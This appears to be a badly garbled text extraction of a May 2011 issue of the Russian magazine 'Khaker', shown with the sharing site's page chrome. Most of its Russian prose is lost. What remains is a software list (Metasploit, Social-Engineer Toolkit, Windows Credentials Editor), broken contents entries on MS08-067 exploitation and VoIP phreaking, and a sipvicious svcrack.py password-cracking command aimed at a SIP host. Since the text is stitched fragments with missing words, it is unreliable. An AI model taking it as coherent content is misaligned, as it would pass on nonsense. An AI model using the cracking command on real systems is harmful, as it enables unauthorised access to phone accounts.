ViGlance OneStep 2
winstack 0.80
>>WINDOWS
>Development
010Editor 3.1.3
CodeBlocks 10.05
Crack.NET v1.2
Diffuse 0.4.4
Enterprise Architect
HttpWatch Basic Edition 7.1.36
jQueryPad
LINQPad
Microsoft Web Platform Installer 2.0
Mockups for Desktop 2.0.19
OllyDbg 2.0.1 alpha 3
SmartAssembly 6.0
Visual Paradigm for UML 8.1 CE
Web Storm 2.0.1
>Devel
Apache Hive 0.7
Django 1.3
>>UNIX
>Desktop
Cardapio 1.0
CuneiForm 12
DjView4 4.7
DjVuLibre 3.5.24
FSV2 1.1.0
Geeqie 1.0
Glippy 0.2.2
Google Picasa 3.0.5744
Guake 0.4.2
LyX 2.0.0
MyTetra 1.28
Parcellite 1.0.1
Qmmp 0.5.0
Shotwell 0.9
Trimage 1.0.5
Webilder 0.6.9
YAGF 0.8.6
Zim 0.50
>Multimedia
AIMP v3.00 Beta 1
Fotobounce 3.2.1
FotoSketcher v2.00
Foxit Reader 4.3
Free Audio Editor 2011
Inkscape 0.48.1
MetatOGGer 4.0
Poladroid 0.9.6r0b
Sculptris Alpha 5
Similarity 1.5.4 beta
Songbird 1.9.3
Tableau Public
VLC 1.1.8
Zoner Photo Studio Free
>System
Auslogics Disk Defrag 3.2
BatteryCare 0.9.8
Beep Codes Viewer 0.4.7.462
DLL Archive 1.0.1
DOSBox 0.74
Double Driver 4.1
FileSeek 2.1.3
HashTab 4.0
LogLady 1.8
Open Hardware Monitor Version 0.2.1
Sikuli-X 1.0rc2
Soluto Beta
Splunk 4.2
SSD Tweak Utility 1.7
UNetbootin 5.49
VirtualBox 4.0.4
Watch 4 Folder 2.0
tinc 1.0.13
VERA 0.3
virtdbg
Visual DuxDebugger 2.0
Windows Credentials Editor v1.1
(WCE)
>Security
Arp scan 1.8
Chaosmap 1.3
Metasploit Framework 3.6.0
mitmproxy 0.4
Monocle Host Discovery Tool 1.0
Multi Threaded TCP Port Scanner 1.3
Packet Fence 2.1.0
QuickRecon 0.2.4
Social-Engineer Toolkit 1.3
sslsnoop 0.4
Subdomain Checker 0.1
t50 2.45
Tor 0.2.1.30
USBsploit 0.6
Wappalyzer 1.13.0
WhatWeb 0.4.7
yInjector
Creepy 0.1.9
Dradis v2.6.1
metasm
Radamsa v0.1.7
radare2
Scapy 2.2.0
sickfuzz 0.3
virtdbg
xsser 1.5.1
>>Net
aMule 2.2.6
EiskaltDC++ 2.2.1
Firefox 4.0
FreetuxTV 0.5.2
Gnash 0.8.9
Google Chrome 10.0.648.204
Hotot 0.9.9
inSSIDer 0.1
KTorrent 4.1
Midori 0.3.3
Minitube 1.4.1
Opera 11.01
Rekonq 0.7.0
Remmina 0.9.2
TrafficPanel 2.5
Transmission 2.22
Twitgin 0.3.0
Vacuum-IM 1.1.0
FriCAS 1.1.2
GCC 4.6.0
HTSQL 2.0.1
JRuby 1.6
Jython 2.5.2
Lazarus 0.9.30
Logisim 2.7.0
Matplotlib 1.0.1
Padre 0.84
PHP 5.3.6
Sqliteman 1.2.2
SWIG 2.0.3
TagLib 1.7
Violet UML Editor 0.21.1
wxPython 2.8.11.0
wxWidgets 2.8.12
>>MAC
Bean 2.4.3
Colloquy 2.3
DropCopy 1.71
Freemind 0.9.0
Juice 2.2
KisMac 0.3.3
MindNote 1.6
NovaBench 1.0
Nvu 1.0
OneButton FTP 1.0
Shiira 2.3
Skim 1.3.13
Sunrise 2.1.5
TextWrangler 3.5.3
Time Out 1.5.7
Tofu 2.0
Tomato Torrent 1.5.1
Xee 2.1.1
xPad 1.2.6
xTorrent 2.0
>X-distr
openSUSE 11.4
>System
AMD Catalyst 11.3
App Runner 0.4.9
Compiz 0.9.4
Fuse-exfat 0.9.4
GlassFish 3.1
GParted 0.8.0
Indicator-Virtualbox 1.1.1
Linux Kernel 2.6.38
Lucene 3.1
MultiSystem
nVidia 260.19.44
VirtualBox 4.0.4
Wine 1.3.17
Xen 4.1
Zfs-fuse 0.7.0
>Server
Apache 2.2.17
BIND 9.7.3
Dnsmasq 2.57
Dovecot 2.0.11
Drizzle 7 GA
HAproxy 1.4.14
LFTP 4.2.1
Monkeyd 0.13.2
MyDNS 1.1.0
nginx 0.9.6
ngIRCd 17.1
Openfire 3.7.0
OpenLDAP 2.4.25
OpenVPN 2.1.4
ProFTPD 1.3.3e
Samba 3.5.8
Squid 3.1.12
XMail 1.27
Games
Red Eclipse 1.0
05(148) 2011

: 2
10
.
5 DVD
. 82
. 68
MS08- 067:
WINDOWS
. 130
PHREAKING
Linux USB-
Red.Button:
Twitter

. 60

VOIP-
VOIP
05 (148) 2011
PWN2OWN:
UNITS
HTTP://WWW2

JavaScript-
CLOUD9
IDE
cloud9ide.com
GLIFFY
gliffy.com
-, JavaScript. :
Eclipse IDE Java C++, ,
- ,
.
,
JavaScript. Cloud9 IDE
,
watch , ,
GitHub.
- , UML-
, Microsoft Visio.
, Gliffy.
,
( ), , , ,

. , .
WUALA
wuala.com
CROCODOC
crocodoc.com
, Dropbox ( ,
), .
, .
? Wuala , Dropbox,
. , , / .
.
, , API- .
crocodoc :

( , PDF) . , ,
, .
. , , Word Acrobat.
144
X 05 /148/ 2011

90

.
210
:

PWN2OWN: . 82
05 (148) 2011
VOIP
5 DVD

VOIP-
. 60
PHREAKING
. 130
Linux USB-
Red.Button:
Twitter

MS08- 067:
WINDOWS
. 68
=90
www.xakep.ru/podpiska

Хакер 2011 05 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 05 PDF

Загружено:

Авторское право:

Доступные форматы

.

systemd, ulatencyd, relayd fscd

.: (495) 935-7034, : (495) 545-0906

30 Firefox 4 550 000

MySQL.com Sun.com , SQL. Naked Security ,

FACEBOOK HACKER CUP

Zone-H 2010 1 419 203

SAMSUNG GALAXY TAB , IPAD 2

13 000 000 . : Bluetooth- ,

- Mozilla Adobe Flash

Hitachi Deskstar 7K2000 ,

, Hitachi Ultrastar A7K2000

Seagate Barracuda Green ST31500541AS .

HD Tune Pro Average read/write, /

Western Digital Caviar Black WD1002FAEX

Seagate Barracuda Green

Western Digital Caviar Black

AIDA 64 Linear Read Western Digital Caviar Green WD30EZRS

AIDA 64 Linear Read SAMSUNG HD204UI

AIDA 64 Linear Read Western Digital Caviar Black WD2001FASS

AIDA 64 Linear Read Hitachi Ultrastar A7K2000

AIDA 64 Linear Read Seagate Barracuda Green ST31500541AS

AIDA 64 Linear Read Hitachi Deskstar 7K2000 HDS722020ALA330

OpenOffice, LibreOffice, AbiWord

Google Docs + MS Office =

Twitter , Cassandra. Facebook

Attack Surface Analyzer Beta

Code Analysis for C/C++

Microsoft Code Analysis Tool .NET (CAT.

Anti-Cross Site Scripting (Anti-XSS)

SiteLock ATL Template

BinScope Binary Analyzer

MiniFuzz File Fuzzer

MiniFuzz File Fuzzer

SDL Regex Fuzzer

SDL Threat Modeling Tool

SDL Process Template

SDL Regex Fuzzer

Wireless Hosted Network

Virtual Hostpot SSID , pass pass pass ( persistent) .

public Response fetchResponse(HTTPClient nextPlugin,

: PHP- ADDSLASHES SQL-

nircmd.exe qboxcom "Do you want to reboot?" \

nircmd.exe setsysvolume 65535

security- Joomla! 1.6.1

' FROM #__weblinks' .

, $filter_order $filter_order_dir SQL,

Tricks & Tips:

. , VoIP SPA-841. IP-, , . , ,

tshark 5060 : tshark

<recv request=REGISTER/> sipp

, . , 101 . 100 123 .

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 \

Windows Metasploit Framework MS08-067. -

Windows XP Professional SP2 SP3

free- Avast, Avira, AVG,

Monitor Program Start.

Avira AntiVir Personal

Comodo Antivirus Free

: Avira AntiVir Personal

avast! FREE Antivirus

AVG Anti-Virus Free Edition

Avira AntiVir Personal Free Antivirus